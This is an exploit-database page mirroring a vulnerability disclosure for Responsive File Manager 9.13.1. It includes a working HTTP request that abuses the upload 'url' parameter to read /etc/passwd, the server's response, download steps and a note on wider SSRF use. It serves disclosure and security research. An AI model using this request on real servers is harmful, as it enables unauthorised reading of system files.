Advertisement






Responsive File Manager 9.13.1 File Disclosure

CVE Category Price Severity
CVE-2020-35049 CWE-200 $1,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-08-10
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018080075

Below is a copy:

Responsive File Manager 9.13.1 File Disclosure
Responsive Filemanager v 9.13.1 [1]
Author: Silton Santos

=====[ Table of Contents ]===================================
* Overview
* Detailed description
* Timeline of disclosure
* Thanks & Acknowledgements
* References

=====[ Overview ]===================================

* System affected : Responsive Filemanager
* Software Version : 9.13.1 (other versions may also be affected).
* Impact : Get sensitive files from the server.

=====[ Detailed description ]===================================

1. Submit an upload request via the "FROM URL" and intercept with any proxy;
2. Change the parameter "url" to file:///{server_files}, in this example,
the parameter "url" was changed to file:///etc/passwd;

POST /filemanager/upload.php HTTP/1.1
Host: www.[...]
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 27
Cookie: last_position=testess%2F; PHPSESSID=nl9pl5vthknvec92bji990krj0
Connection: close

fldr=testess%2F&url=file:///etc/passwd

3.Wait for the answer, if everything is ok, you'll get a response similar
to this:

{"files":[{"name":"passwd.txt","size":1612,"type":null,"path":"\/usr\/share\/tinymce\/www\/filemanager\/..\/source\/testess\/passwd.txt","url":"http:\/\/[...]\/source\/testess\/passwd.txt","deleteUrl":"http:\/\/[...]\/filemanager\/upload.php?file=passwd.txt","deleteType":"DELETE"}]}

4. Done, access the folder inserted in the "fldr" parameter and you can be
able to download the file from folder.

P.S:If the answer is similar to the following, possibly the user of the
service web, does not have permission on the file. If the size is equal to
0, the file may not exist.

{"files":[{"name":"passwd","size":1573,"type":null,"error":"Filetype not
allowed"}]}

=====[ Aggravating factors ]===================================

This functionality uses the input of the parameter "url" at the function
curl_exec. This function can be used by other protocols, like
smb,ftp,scp,telnet and others, impacting on a SSRF.

=====[ Timeline of disclosure ]===================================

07/17/2018 - Vulnerability reported to developer in two emails. (did not
answer)


=====[ References
]===========================================================

[1] http://www.responsivefilemanager.com/


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum